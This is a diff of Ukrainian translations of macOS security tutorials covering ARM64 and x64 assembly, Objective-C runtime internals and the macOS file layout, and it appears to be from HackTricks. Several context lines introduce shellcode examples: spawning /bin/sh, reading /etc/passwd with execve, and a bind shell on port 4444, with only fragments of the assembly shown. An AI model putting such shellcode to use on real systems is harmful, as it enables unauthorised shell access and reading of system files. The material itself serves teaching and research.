Крім того, є ще **32 реєстри довжиною 128 біт**, які можуть використовуватися в оптимізованих операціях з одноразовими інструкціями (SIMD) та для виконання арифметики з плаваючою комою. Вони називаються реєстрами Vn, хоча вони також можуть працювати в **64**-бітному, **32**-бітному, **16**-бітному та **8**-бітному режимах, і тоді їх називають **`Qn`**, **`Dn`**, **`Sn`**, **`Hn`** та **`Bn`**.
### Системні реєстри
**Є сотні системних реєстрів**, також відомих як спеціалізовані реєстри (SPRs), які використовуються для **моніторингу** та **контролю** поведінки **процесорів**.\
Вони можуть бути прочитані або встановлені лише за допомогою спеціальних інструкцій **`mrs`** та **`msr`**.
Спеціальні реєстри **`TPIDR_EL0`** та **`TPIDDR_EL0`** зазвичай зустрічаються під час реверсного інжинірингу. Суфікс `EL0` вказує на **мінімальне виключення**, з якого можна отримати доступ до реєстру (в цьому випадку EL0 - це звичайний рівень виключення (привілеїв), з яким працюють звичайні програми).\
Спеціальні реєстри **`TPIDR_EL0`** та **`TPIDDR_EL0`** зазвичай зустрічаються під час реверс-інжинірингу. Суфікс `EL0` вказує на **мінімальне виключення**, з якого реєстр може бути доступний (в цьому випадку EL0 - це звичайний рівень виключення (привілеїв), з яким працюють звичайні програми).\
Вони часто використовуються для зберігання **базової адреси регіону пам'яті локального зберігання потоку**. Зазвичай перший з них є читабельним і записуваним для програм, що працюють на EL0, але другий може бути прочитаний з EL0 і записаний з EL1 (як ядро).
- `mrs x0, TPIDR_EL0 ; Прочитати TPIDR_EL0 в x0`
@ -75,24 +75,24 @@ ARM64 має **31 загальний реєстр**, позначений `x0`
- Сума двох позитивних чисел дає негативний результат.
- Сума двох негативних чисел дає позитивний результат.
- У відніманні, коли велике негативне число віднімається від меншого позитивного числа (або навпаки), і результат не може бути представленим у межах заданого розміру біта.
- Очевидно, процесор не знає, чи операція підписана чи ні, тому він перевірить C та V в операціях і вказує, чи відбулося перенесення у випадку, якщо це було підписане або без підпису.
- Очевидно, процесор не знає, чи операція підписана чи ні, тому він перевіряє C та V в операціях і вказує, чи відбулося перенесення у випадку, якщо це було підписане або без підпису.
> [!WARNING]
> Не всі інструкції оновлюють ці прапори. Деякі, такі як **`CMP`** або **`TST`**, роблять це, а інші, які мають суфікс s, такі як **`ADDS`**, також це роблять.
- Поточний **прапор ширини реєстру (`nRW`)**: Якщо прапор має значення 0, програма буде виконуватися в стані виконання AArch64 після відновлення.
- Поточний **прапор ширини реєстра** (`nRW`): Якщо прапор має значення 0, програма буде виконуватися в стані виконання AArch64 після відновлення.
- Поточний **рівень виключення** (**`EL`**): Звичайна програма, що працює на EL0, матиме значення 0.
- Прапор **одиночного кроку** (**`SS`**): Використовується відладчиками для одиночного кроку, встановлюючи прапор SS в 1 всередині **`SPSR_ELx`** через виключення. Програма виконає крок і видасть виключення одиночного кроку.
- Прапор **недопустимого виключення** (**`IL`**): Використовується для позначення, коли привілейоване програмне забезпечення виконує недопустимий перехід рівня виключення, цей прапор встановлюється в 1, і процесор викликає виключення недопустимого стану.
- Прапор **недопустимого виключення** (**`IL`**): Використовується для позначення, коли привілейоване програмне забезпечення виконує недопустимий перехід на рівень виключення, цей прапор встановлюється в 1, і процесор викликає виключення недопустимого стану.
- Прапори **`DAIF`**: Ці прапори дозволяють привілейованій програмі вибірково маскувати певні зовнішні виключення.
- Якщо **`A`** дорівнює 1, це означає, що будуть викликані **асинхронні перерви**. **`I`** налаштовує відповідь на зовнішні запити переривання (IRQ). а F пов'язаний з **швидкими запитами переривання** (FIR).
- Якщо **`A`** дорівнює 1, це означає, що будуть викликані **асинхронні перерви**. **`I`** налаштовує відповідь на зовнішні запити переривань (IRQ). а F пов'язаний з **швидкими запитами переривань** (FIR).
- Прапори **вибору вказівника стеку** (**`SPS`**): Привілейовані програми, що працюють на EL1 та вище, можуть перемикатися між використанням свого власного реєстру вказівника стеку та реєстром моделі користувача (наприклад, між `SP_EL1` та `EL0`). Це перемикання виконується шляхом запису в спеціальний реєстр **`SPSel`**. Це не можна зробити з EL0.
## **Конвенція виклику (ARM64v8)**
Конвенція виклику ARM64 вказує, що **перші вісім параметрів** до функції передаються в реєстрах **`x0` до `x7`**. **Додаткові** параметри передаються на **стек**. Значення **повернення** передається назад у реєстр **`x0`**, або в **`x1`**, якщо воно довжиною 128 біт. Реєстри **`x19`** до **`x30`** та **`sp`** повинні бути **збережені** під час викликів функцій.
При читанні функції в асемблері шукайте **пролог та епілог функції**. **Пролог** зазвичай включає **збереження вказівника кадру (`x29`)**, **налаштування** нового **вказівника кадру** та **виділення простору в стеку**. **Епілог** зазвичай включає **відновлення збереженого вказівника кадру** та **повернення** з функції.
Коли читаєте функцію в асемблері, шукайте **пролог та епілог функції**. **Пролог** зазвичай включає **збереження вказівника кадру (`x29`)**, **налаштування** нового **вказівника кадру** та **виділення простору в стеку**. **Епілог** зазвичай включає **відновлення збереженого вказівника кадру** та **повернення** з функції.
### Конвенція виклику в Swift
@ -109,20 +109,20 @@ Swift має свою власну **конвенцію виклику**, яку
- **Режим зсуву**: Зсув, що впливає на початковий вказівник, вказується, наприклад:
- `ldr x2, [x1, #8]`, це завантажить в x2 значення з x1 + 8
- `ldr x2, [x0, x1, lsl #2]`, це завантажить в x2 об'єкт з масиву x0, з позиції x1 (індекс) \* 4
- **Режим попереднього індексування**: Це застосує обчислення до початкового, отримає результат і також зберігає новий початок у початковому.
- **Режим попереднього індексу**: Це застосує обчислення до початкового, отримає результат і також зберігає новий початок у початковому.
- `ldr x2, [x1, #8]!`, це завантажить `x1 + 8` в `x2` і зберігає в x1 результат `x1 + 8`
- `str lr, [sp, #-4]!`, Зберегти реєстр зв'язку в sp і оновити реєстр sp
- **Режим постіндексування**: Це як попередній, але адреса пам'яті спочатку доступна, а потім обчислюється та зберігається зсув.
- **Режим постіндексу**: Це схоже на попередній, але адреса пам'яті спочатку доступна, а потім зсув обчислюється та зберігається.
- `ldr x0, [x1], #8`, завантажити `x1` в `x0` і оновити x1 з `x1 + 8`
- **Адресація відносно PC**: У цьому випадку адреса для завантаження обчислюється відносно реєстру PC
- `ldr x1, =_start`, Це завантажить адресу, де символ `_start` починається в x1, відносно поточного PC.
- **`str`**: **Зберегти** значення з **реєстру** в **пам'ять**.
- Приклад: `str x0, [x1]` — Це зберігає значення в `x0` в пам'яті, на яку вказує `x1`.
- **`ldp`**: **Завантажити пару реєстрів**. Ця інструкція **завантажує два реєстри** з **послідовних** адрес пам'яті. Адреса пам'яті зазвичай формується шляхом додавання зсуву до значення в іншому реєстрі.
- Приклад: `ldp x0, x1, [x2]` — Це завантажує `x0` та `x1` з адрес пам'яті за `x2` та `x2 + 8`, відповідно.
- Приклад: `ldp x0, x1, [x2]` — Це завантажує `x0` та `x1` з пам'яті за адресами `x2` та `x2 + 8`, відповідно.
- **`stp`**: **Зберегти пару реєстрів**. Ця інструкція **зберігає два реєстри** в **послідовні** адреси пам'яті. Адреса пам'яті зазвичай формується шляхом додавання зсуву до значення в іншому реєстрі.
- Приклад: `stp x0, x1, [sp]` — Це зберігає `x0` та `x1` в адресах пам'яті за `sp` та `sp + 8`, відповідно.
- `stp x0, x1, [sp, #16]!` — Це зберігає `x0` та `x1` в адресах пам'яті за `sp+16` та `sp + 24`, відповідно, і оновлює `sp` з `sp+16`.
- Приклад: `stp x0, x1, [sp]` — Це зберігає `x0` та `x1` в пам'яті за адресами `sp` та `sp + 8`, відповідно.
- `stp x0, x1, [sp, #16]!` — Це зберігає `x0` та `x1` в пам'яті за адресами `sp+16` та `sp + 24`, відповідно, і оновлює `sp` з `sp+16`.
- **`add`**: **Додати** значення двох реєстрів і зберегти результат у реєстрі.
- Синтаксис: add(s) Xn1, Xn2, Xn3 | #imm, \[shift #N | RRX]
- Xn1 -> Призначення
@ -134,25 +134,25 @@ Swift має свою власну **конвенцію виклику**, яку
- **`adds`** Це виконує `add` і оновлює прапори.
- **`sub`**: **Відняти** значення двох реєстрів і зберегти результат у реєстрі.
- Перевірте **`add`** **синтаксис**.
- Приклад: `sub x0, x1, x2` — Це віднімає значення в `x2` з `x1` і зберігає результат в `x0`.
- **`subs`** Це як sub, але оновлює прапор.
- Приклад: `sub x0, x1, x2` — Це віднімає значення в `x2` від `x1` і зберігає результат в `x0`.
- **`subs`** Це схоже на sub, але оновлює прапор.
- **`mul`**: **Помножити** значення **двох реєстрів** і зберегти результат у реєстрі.
- Приклад: `mul x0, x1, x2` — Це множить значення в `x1` та `x2` і зберігає результат в `x0`.
- **`div`**: **Поділити** значення одного реєстру на інше і зберегти результат у реєстрі.
- Приклад: `div x0, x1, x2` — Це ділить значення в `x1` на `x2` і зберігає результат в `x0`.
- **`lsl`**, **`lsr`**, **`asr`**, **`ror`, `rrx`**:
- **Логічний зсув вліво**: Додає 0 з кінця, переміщуючи інші біти вперед (множить на n разів 2).
- **Логічний зсув вправо**: Додає 1 на початку, переміщуючи інші біти назад (ділить на n разів 2 в беззнаковому).
- **Арифметичний зсув вправо**: Як **`lsr`**, але замість додавання 0, якщо найзначніший біт - 1, **додаються 1** (ділить на n разів 2 в знаковому).
- **Зсув вправо з розширенням**: Як **`ror`**, але з прапором переносу як "найзначніший біт". Тобто прапор переносу переміщується до біта 31, а видалений біт - до прапора переносу.
- **Логічний зсув вправо**: Додає 1 на початку, переміщуючи інші біти назад (ділить на n разів 2 в беззнаковому вигляді).
- **Арифметичний зсув вправо**: Як **`lsr`**, але замість додавання 0, якщо найзначніший біт - 1, **додаються 1** (ділить на n разів 2 в знаковому вигляді).
- **Зсув вправо з розширенням**: Як **`ror`**, але з прапором перенесення як "найзначнішим бітом". Тобто прапор перенесення переміщується до біта 31, а видалений біт - до прапора перенесення.
- **`bfm`**: **Переміщення бітового поля**, ці операції **копіюють біти `0...n`** з значення та розміщують їх у позиціях **`m..m+n`**. **`#s`** вказує на **найлівішу позицію біта**, а **`#r`** - на **кількість зсуву вправо**.
- Переміщення бітового поля: `BFM Xd, Xn, #r`
- Переміщення знакового бітового поля: `SBFM Xd, Xn, #r, #s`
- Переміщення беззнакового бітового поля: `UBFM Xd, Xn, #r, #s`
- **Витягування та вставка бітового поля:** Копіює бітове поле з одного реєстру та копіює його в інший реєстр.
- **`BFI X1, X2, #3, #4`** Вставити 4 біти з X2 з 3-го біта X1.
- **`BFXIL X1, X2, #3, #4`** Витягнути з 3-го біта X2 чотири біти та скопіювати їх в X1.
- **`SBFIZ X1, X2, #3, #4`** Розширити знак 4 біт з X2 та вставити їх в X1, починаючи з позиції біта 3, обнуляючи праві біти.
- **`BFI X1, X2, #3, #4`** Вставляє 4 біти з X2 з 3-го біта X1.
- **`BFXIL X1, X2, #3, #4`** Витягує з 3-го біта X2 чотири біти та копіює їх в X1.
- **`SBFIZ X1, X2, #3, #4`** Розширює знак 4 біт з X2 та вставляє їх в X1, починаючи з позиції біта 3, обнуляючи праві біти.
- **`SBFX X1, X2, #3, #4`** Витягує 4 біти, починаючи з біта 3 з X2, розширює їх, і поміщає результат в X1.
- **`UBFIZ X1, X2, #3, #4`** Нульове розширення 4 біт з X2 та вставка їх в X1, починаючи з позиції біта 3, обнуляючи праві біти.
- **`UBFX X1, X2, #3, #4`** Витягує 4 біти, починаючи з біта 3 з X2, і поміщає нульове розширене значення в X1.
@ -170,10 +170,10 @@ Swift має свою власну **конвенцію виклику**, яку
- **`ccmp`**: Умовне порівняння, це порівняння, яке буде виконано лише якщо попереднє порівняння було істинним і спеціально встановить біти nzcv.
- `cmp x1, x2; ccmp x3, x4, 0, NE; blt _func` -> якщо x1 != x2 і x3 < x4, перейти до func.
- Це тому, що **`ccmp`** буде виконано лише якщо **попереднє `cmp` було `NE`**, якщо ні, біти `nzcv` будуть встановлені в 0 (що не задовольнить порівняння `blt`).
- Це також може бути використано як `ccmn` (те ж саме, але негативне, як `cmp` проти `cmn`).
- **`tst`**: Перевіряє, чи є будь-які з значень порівняння обидва 1 (працює як ANDS без зберігання результату кудись). Корисно перевірити реєстр з значенням і перевірити, чи є будь-які біти реєстру, вказані в значенні, 1.
- Це також може використовуватися як `ccmn` (те ж саме, але негативне, як `cmp` проти `cmn`).
- **`tst`**: Перевіряє, чи є будь-які з значень порівняння обидва 1 (працює як ANDS без зберігання результату десь). Корисно перевірити реєстр з значенням і перевірити, чи будь-які біти реєстру, вказані в значенні, є 1.
- Приклад: `tst X1, #7` Перевірити, чи є будь-які з останніх 3 бітів X1 1.
- **`teq`**: Операція XOR, відкидаючи результат.
- **`teq`**: Операція XOR, що ігнорує результат.
- **`b`**: Безумовний перехід.
- Приклад: `b myFunction`.
- Зверніть увагу, що це не заповнить реєстр зв'язку адресою повернення (не підходить для викликів підпрограм, які потребують повернення назад).
@ -188,7 +188,7 @@ Swift має свою власну **конвенцію виклику**, яку
- **`b.eq`**: **Перехід, якщо рівно**, на основі попередньої інструкції `cmp`.
- Приклад: `b.eq label` — Якщо попередня інструкція `cmp` знайшла два рівні значення, це переходить до `label`.
- **`b.ne`**: **Перехід, якщо не рівно**. Ця інструкція перевіряє умови прапорів (які були встановлені попередньою інструкцією порівняння), і якщо порівняні значення не були рівні, вона переходить до мітки або адреси.
- Приклад: Після інструкції `cmp x0, x1`, `b.ne label` — Якщо значення в `x0` та `x1` не були рівні, це переходить до `label`.
- Приклад: Після інструкції `cmp x0, x1`, `b.ne label` — Якщо значення в `x0` та `x1 не рівні, це переходить до `label`.
- **`cbz`**: **Порівняти та перейти на нуль**. Ця інструкція порівнює реєстр з нулем, і якщо вони рівні, переходить до мітки або адреси.
- Приклад: `cbz x0, label` — Якщо значення в `x0` нульове, це переходить до `label`.
- **`cbnz`**: **Порівняти та перейти на ненульове**. Ця інструкція порівнює реєстр з нулем, і якщо вони не рівні, переходить до мітки або адреси.
@ -212,8 +212,8 @@ Swift має свою власну **конвенцію виклику**, яку
- **`ldrsw`**: **Завантажити** підписане **32-бітне** значення з пам'яті та **розширити його до 64** біт.
- Приклад: `ldrsw x0, [x1]` — Це завантажує підписане 32-бітне значення з пам'яті, на яку вказує `x1`, розширює його до 64 біт і зберігає в `x0`.
- **`stur`**: **Зберегти значення реєстру в адресі пам'яті**, використовуючи зсув з іншого реєстру.
- Приклад: `stur x0, [x1, #4]` — Це зберігає значення в `x0` в адресі пам'яті, яка на 4 байти більша, ніж адреса, що зараз в `x1`.
- **`svc`** : Зробити **системний виклик**. Це означає "Виклик супервізора". Коли процесор виконує цю інструкцію, він **перемикається з режиму користувача в режим ядра** і переходить до певного місця в пам'яті, де знаходиться **код обробки системних викликів ядра**.
- Приклад: `stur x0, [x1, #4]` — Це зберігає значення в `x0` в пам'яті, адреса якої на 4 байти більша, ніж адреса, що зараз в `x1`.
- **`svc`** : Зробити **системний виклик**. Це означає "Виклик наглядача". Коли процесор виконує цю інструкцію, він **перемикається з режиму користувача в режим ядра** і переходить до певного місця в пам'яті, де знаходиться **код обробки системних викликів ядра**.
- Приклад:
@ -245,7 +245,7 @@ ldp x29, x30, [sp], #16 ; load pair x29 and x30 from the stack and increment th
Armv8-A підтримує виконання 32-бітних програм. **AArch32** може працювати в одному з **двох наборів інструкцій**: **`A32`** та **`T32`** і може перемикатися між ними через **`interworking`**.\
**Привілейовані** 64-бітні програми можуть планувати **виконання 32-бітних** програм, виконуючи передачу рівня виключення на нижчий привілейований 32-біт.\
Зверніть увагу, що перехід з 64-біт на 32-біт відбувається знижуючи рівень виключення (наприклад, 64-бітна програма в EL1 викликає програму в EL0). Це робиться шляхом встановлення **біта 4** спеціального регістра **`SPSR_ELx`** **в 1**, коли потік процесу `AArch32` готовий до виконання, а решта `SPSR_ELx` зберігає **CPSR** програм **`AArch32`**. Потім привілейований процес викликає інструкцію **`ERET`**, щоб процесор перейшов до **`AArch32`**, входячи в A32 або T32 в залежності від CPSR\*\*.\*\*
Зверніть увагу, що перехід з 64-біт на 32-біт відбувається знижуючи рівень виключення (наприклад, 64-бітна програма в EL1 викликає програму в EL0). Це робиться шляхом встановлення **біта 4** спеціального регістру **`SPSR_ELx`** **в 1**, коли потік процесу `AArch32` готовий до виконання, а решта `SPSR_ELx` зберігає **`AArch32`** програми CPSR. Потім привілейований процес викликає інструкцію **`ERET`**, щоб процесор перейшов до **`AArch32`**, входячи в A32 або T32 в залежності від CPSR\*\*.\*\*
**`interworking`** відбувається за допомогою бітів J та T CPSR. `J=0` та `T=0` означає **`A32`**, а `J=0` та `T=1` означає **T32**. Це в основному означає встановлення **найнижчого біта в 1**, щоб вказати, що набір інструкцій є T32.\
Це встановлюється під час **інструкцій переходу interworking**, але також може бути встановлено безпосередньо з іншими інструкціями, коли PC встановлено як регістр призначення. Приклад:
@ -271,7 +271,7 @@ mov r0, #8
- **`r13`**: Вказівник стеку
- **`r14`**: Регістр посилання
Більше того, регістри зберігаються в **`банківських реєстрах`**. Це місця, які зберігають значення регістрів, що дозволяє виконувати **швидке перемикання контексту** під час обробки виключень та привілейованих операцій, щоб уникнути необхідності вручну зберігати та відновлювати регістри щоразу.\
Більше того, регістри зберігаються в **`банківських реєстрах`**. Це місця, які зберігають значення регістрів, що дозволяє виконувати **швидке перемикання контексту** під час обробки виключень і привілейованих операцій, щоб уникнути необхідності вручну зберігати та відновлювати регістри щоразу.\
Це робиться шляхом **збереження стану процесора з `CPSR` до `SPSR`** режиму процесора, в якому виникає виключення. Під час повернення з виключення, **`CPSR`** відновлюється з **`SPSR`**.
### CPSR - Реєстр поточного статусу програми
@ -299,12 +299,12 @@ mov r0, #8
- Біти **`J`** та **`T`**: **`J`** має бути 0, і якщо **`T`** дорівнює 0, використовується набір інструкцій A32, а якщо 1, використовується T32.
- **Реєстр стану блоку IT** (`ITSTATE`): Це біти з 10-15 та 25-26. Вони зберігають умови для інструкцій всередині групи з префіксом **`IT`**.
- Біт **`E`**: Вказує на **порядок байтів**.
- Біти **`E`**: Вказують на **порядок байтів**.
- Біти маски режиму та виключення (0-4): Вони визначають поточний стан виконання. **5-й** вказує, чи програма працює в 32-бітному (1) або 64-бітному (0) режимі. Інші 4 представляють **режим виключення, що використовується в даний момент** (коли виникає виключення і його обробляють). Встановлене число **вказує на поточний пріоритет** у разі, якщо виникає інше виключення під час обробки цього.
<figure><img src="../../../images/image (1200).png" alt=""><figcaption></figcaption></figure>
- **`AIF`**: Деякі виключення можуть бути вимкнені за допомогою бітів **`A`**, `I`, `F`. Якщо **`A`** дорівнює 1, це означає, що **асинхронні аборти** будуть викликані. **`I`** налаштовує відповідь на зовнішні апаратні **Запити переривання** (IRQ). а F пов'язаний з **Швидкими запитами переривання** (FIR).
- **`AIF`**: Деякі виключення можуть бути вимкнені за допомогою бітів **`A`**, `I`, `F`. Якщо **`A`** дорівнює 1, це означає, що **асинхронні аборти** будуть викликані. **`I`** налаштовує відповідь на зовнішні апаратні **Запити переривань** (IRQ). а F пов'язаний з **Швидкими запитами переривань** (FIR).
## macOS
@ -314,7 +314,7 @@ mov r0, #8
### Mach Traps
Перегляньте в [**syscall_sw.c**](https://opensource.apple.com/source/xnu/xnu-3789.1.32/osfmk/kern/syscall_sw.c.auto.html) `mach_trap_table` та в [**mach_traps.h**](https://opensource.apple.com/source/xnu/xnu-3789.1.32/osfmk/mach/mach_traps.h) прототипи. Максимальна кількість Mach traps становить `MACH_TRAP_TABLE_COUNT` = 128. Mach traps матимуть **x16 < 0**, тому вам потрібно викликати номери з попереднього списку з **мінусом**: **`_kernelrpc_mach_vm_allocate_trap`** це **`-10`**.
Перегляньте в [**syscall_sw.c**](https://opensource.apple.com/source/xnu/xnu-3789.1.32/osfmk/kern/syscall_sw.c.auto.html) `mach_trap_table` та в [**mach_traps.h**](https://opensource.apple.com/source/xnu/xnu-3789.1.32/osfmk/mach/mach_traps.h) прототипи. Максимальна кількість Mach traps дорівнює `MACH_TRAP_TABLE_COUNT` = 128. Mach traps матимуть **x16 < 0**, тому вам потрібно викликати номери з попереднього списку з **мінусом**: **`_kernelrpc_mach_vm_allocate_trap`** дорівнює **`-10`**.
Ви також можете перевірити **`libsystem_kernel.dylib`** в дизасемблері, щоб дізнатися, як викликати ці (та BSD) системні виклики:
```bash
@ -335,9 +335,9 @@ XNU підтримує ще один тип викликів, званий за
### comm page
Це сторінка пам'яті, що належить ядру, яка відображається в адресному просторі кожного процесу користувача. Вона призначена для того, щоб зробити перехід з режиму користувача в простір ядра швидшим, ніж використання системних викликів для сервісів ядра, які використовуються настільки часто, що цей перехід був би дуже неефективним.
Це сторінка пам'яті, що належить ядру, яка відображається в адресному просторі кожного процесу користувача. Вона призначена для того, щоб зробити перехід з режиму користувача в простір ядра швидшим, ніж використання системних викликів для служб ядра, які використовуються настільки часто, що цей перехід був би дуже неефективним.
Наприклад, виклик `gettimeofdate` читає значення `timeval` безпосередньо з комунікаційної сторінки.
Наприклад, виклик `gettimeofdate` читає значення `timeval` безпосередньо зі сторінки комунікації.
### objc_msgSend
@ -349,7 +349,7 @@ XNU підтримує ще один тип викликів, званий за
- x1: op -> Селектор методу
- x2... -> Інші аргументи викликаного методу
Отже, якщо ви поставите точку зупинки перед переходом до цієї функції, ви можете легко знайти, що викликається в lldb (в цьому прикладі об'єкт викликає об'єкт з `NSConcreteTask`, який виконає команду):
Отже, якщо ви поставите точку зупинки перед переходом до цієї функції, ви зможете легко знайти, що викликається в lldb (в цьому прикладі об'єкт викликає об'єкт з `NSConcreteTask`, який виконає команду):
```bash
# Right in the line were objc_msgSend will be called
(lldb) po $x0
@ -370,7 +370,7 @@ whoami
> [!TIP]
> Встановивши змінну середовища **`NSObjCMessageLoggingEnabled=1`**, можна записувати, коли ця функція викликається у файлі, наприклад, `/tmp/msgSends-pid`.
>
> Більше того, встановивши **`OBJC_HELP=1`** та викликавши будь-який бінар, ви можете побачити інші змінні середовища, які можна використовувати для **логування**, коли відбуваються певні дії Objc-C.
> Більше того, встановивши **`OBJC_HELP=1`** та викликавши будь-який бінар, ви можете побачити інші змінні середовища, які ви могли б використовувати для **логування** певних дій Objc-C.
Коли ця функція викликається, потрібно знайти викликаний метод вказаного екземпляра, для цього проводяться різні пошуки:
@ -469,7 +469,7 @@ return 0;
Взято з [**тут**](https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/master/shell.s) та пояснено.
{{#tabs}}
{{#tab name="with adr"}}
{{#tab name="з adr"}}
```armasm
.section __TEXT,__text ; This directive tells the assembler to place the following code in the __text section of the __TEXT segment.
.global _main ; This makes the _main label globally visible, so that the linker can find it as the entry point of the program.
@ -538,7 +538,7 @@ sh_path: .asciz "/bin/sh"
#### Читати за допомогою cat
Мета полягає в виконанні `execve("/bin/cat", ["/bin/cat", "/etc/passwd"], NULL)`, тому другий аргумент (x1) є масивом параметрів (які в пам'яті означають стек адрес).
Мета полягає в тому, щоб виконати `execve("/bin/cat", ["/bin/cat", "/etc/passwd"], NULL)`, тому другий аргумент (x1) є масивом параметрів (які в пам'яті означають стек адрес).
```armasm
.section __TEXT,__text ; Begin a new section of type __TEXT and name __text
.global _main ; Declare a global symbol _main
@ -564,7 +564,7 @@ cat_path: .asciz "/bin/cat"
.align 2
passwd_path: .asciz "/etc/passwd"
```
#### Виклик команди з sh з дочірнього процесу, щоб основний процес не був вбитий
#### Виклик команди з sh з форка, щоб основний процес не був вбитий
```armasm
.section __TEXT,__text ; Begin a new section of type __TEXT and name __text
.global _main ; Declare a global symbol _main

10
src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/introduction-to-x64.md
View File

@ -50,7 +50,7 @@ Swift має свою власну **конвенцію виклику**, яку
- Приклад: `cmp rax, rdx` — Порівнює `rax` з `rdx`.
- **`je`, `jne`, `jl`, `jge`, ...**: **Умовні стрибки**, які змінюють потік управління на основі результатів попереднього `cmp` або тесту.
- Приклад: Після інструкції `cmp rax, rdx`, `je label` — Стрибає до `label`, якщо `rax` дорівнює `rdx`.
- **`syscall`**: Використовується для **системних викликів** в деяких системах x64 (наприклад, в сучасному Unix).
- **`syscall`**: Використовується для **системних викликів** в деяких системах x64 (наприклад, в сучасних Unix).
- **`sysenter`**: Оптимізована інструкція **системного виклику** на деяких платформах.
### **Прокол функції**
@ -78,7 +78,7 @@ Swift має свою власну **конвенцію виклику**, яку
#define SYSCALL_CLASS_DIAG 4 /* Diagnostics */
#define SYSCALL_CLASS_IPC 5 /* Mach IPC */
```
Тоді ви можете знайти кожен номер системного виклику [**за цим посиланням**](https://opensource.apple.com/source/xnu/xnu-1504.3.12/bsd/kern/syscalls.master)**:**
Тоді ви можете знайти кожен номер системного виклику [**в цьому URL**](https://opensource.apple.com/source/xnu/xnu-1504.3.12/bsd/kern/syscalls.master)**:**
```c
0 AUE_NULL ALL { int nosys(void); } { indirect syscall }
1 AUE_EXIT ALL { void exit(int rval); }
@ -171,7 +171,7 @@ return 0;
Взято з [**тут**](https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/master/shell.s) та пояснено.
{{#tabs}}
{{#tab name="with adr"}}
{{#tab name="з adr"}}
```armasm
bits 64
global _main
@ -209,7 +209,7 @@ syscall
#### Читати за допомогою cat
Мета полягає в виконанні `execve("/bin/cat", ["/bin/cat", "/etc/passwd"], NULL)`, тому другим аргументом (x1) є масив параметрів (які в пам'яті означають стек адрес).
Мета полягає в виконанні `execve("/bin/cat", ["/bin/cat", "/etc/passwd"], NULL)`, тому другий аргумент (x1) є масивом параметрів (які в пам'яті означають стек адрес).
```armasm
bits 64
section .text
@ -280,7 +280,7 @@ touch_command: db "touch /tmp/lalala", 0
```
#### Bind shell
Bind shell з [https://packetstormsecurity.com/files/151731/macOS-TCP-4444-Bind-Shell-Null-Free-Shellcode.html](https://packetstormsecurity.com/files/151731/macOS-TCP-4444-Bind-Shell-Null-Free-Shellcode.html) на **порті 4444**
Bind shell з [https://packetstormsecurity.com/files/151731/macOS-TCP-4444-Bind-Shell-Null-Free-Shellcode.html](https://packetstormsecurity.com/files/151731/macOS-TCP-4444-Bind-Shell-Null-Free-Shellcode.html) на **порт 4444**
```armasm
section .text
global _main

10
src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/objects-in-memory.md
View File

@ -55,7 +55,7 @@ uintptr_t requiredAlignment; // Or in _kCFRuntimeRequiresAlignment in the .versi
```
## Objective-C
### Memory sections used
### Використовувані секції пам'яті
Більшість даних, що використовуються середовищем виконання ObjectiveC, змінюватимуться під час виконання, тому воно використовує деякі секції з сегмента **\_\_DATA** в пам'яті:
@ -74,13 +74,13 @@ uintptr_t requiredAlignment; // Or in _kCFRuntimeRequiresAlignment in the .versi
- **`__objc_nlclslist`** (`classref_t`): Вказівник на не-ліниві класи Objective-C, визначені в цьому бінарному файлі
- **`__objc_classlist`** (`classref_t`): Вказівники на всі класи Objective-C, визначені в цьому бінарному файлі
Воно також використовує кілька секцій у сегменті **`__TEXT`** для зберігання постійних значень, якщо записати в цю секцію неможливо:
Воно також використовує кілька секцій у сегменті **`__TEXT`** для зберігання постійних значень, якщо запис у цій секції неможливий:
- **`__objc_methname`** (C-String): Імена методів
- **`__objc_classname`** (C-String): Імена класів
- **`__objc_methtype`** (C-String): Типи методів
### Type Encoding
### Кодування типів
Objective-C використовує деяке манглювання для кодування селекторів і типів змінних простих і складних типів:
@ -88,7 +88,7 @@ Objective-C використовує деяке манглювання для к
- Інші типи даних, літери яких використовуються або є спеціальними, використовують інші літери або символи, такі як `q` для `long long`, `b` для `bitfields`, `B` для `booleans`, `#` для `classes`, `@` для `id`, `*` для `char pointers`, `^` для загальних `pointers` і `?` для `undefined`.
- Масиви, структури та об'єднання використовують `[`, `{` і `(`
#### Example Method Declaration
#### Приклад оголошення методу
```objectivec
- (NSString *)processString:(id)input withOptions:(char *)options andError:(id)error;
```
@ -112,7 +112,7 @@ Objective-C використовує деяке манглювання для к
5. **Другий аргумент (`NSDictionary * options`)**: Закодовано як `@`, на зсуві 20
6. **Третій аргумент (`NSError ** error`)**: Закодовано як `^@`, на зсуві 24
**З селектором + кодуванням ви можете відновити метод.**
**З селектором + кодуванням ви можете відтворити метод.**
### **Класи**

44
src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md
View File

@ -12,13 +12,13 @@
- **/Library**: Тут можна знайти багато підкаталогів і файлів, пов'язаних з налаштуваннями, кешами та журналами. Папка Library існує в кореневому каталозі та в каталозі кожного користувача.
- **/private**: Не задокументовано, але багато з вказаних папок є символічними посиланнями на приватний каталог.
- **/sbin**: Основні системні бінарні файли (пов'язані з адмініструванням)
- **/System**: Файли для запуску OS X. Тут ви повинні знайти в основному лише специфічні для Apple файли (не сторонні).
- **/System**: Файл для запуску OS X. Тут ви повинні знайти в основному лише специфічні для Apple файли (не сторонні).
- **/tmp**: Файли видаляються через 3 дні (це м'яке посилання на /private/tmp)
- **/Users**: Домашній каталог для користувачів.
- **/usr**: Конфігураційні та системні бінарні файли
- **/var**: Журнальні файли
- **/Volumes**: Змонтовані диски з'являться тут.
- **/.vol**: Запустивши `stat a.txt`, ви отримаєте щось на зразок `16777223 7545753 -rw-r--r-- 1 username wheel ...`, де перше число - це ідентифікатор тома, де існує файл, а друге - номер inode. Ви можете отримати доступ до вмісту цього файлу через /.vol/ з цією інформацією, запустивши `cat /.vol/16777223/7545753`
- **/.vol**: Запустивши `stat a.txt`, ви отримаєте щось на зразок `16777223 7545753 -rw-r--r-- 1 username wheel ...`, де перше число - це ідентифікатор тому, де існує файл, а друге - номер inode. Ви можете отримати доступ до вмісту цього файлу через /.vol/ з цією інформацією, запустивши `cat /.vol/16777223/7545753`
### Папки додатків
@ -26,7 +26,7 @@
- **Встановлені** програми зазвичай встановлюються в `/Applications` або в `~/Applications`
- **Дані програми** можна знайти в `/Library/Application Support` для програм, що працюють від імені root, і `~/Library/Application Support` для програм, що працюють від імені користувача.
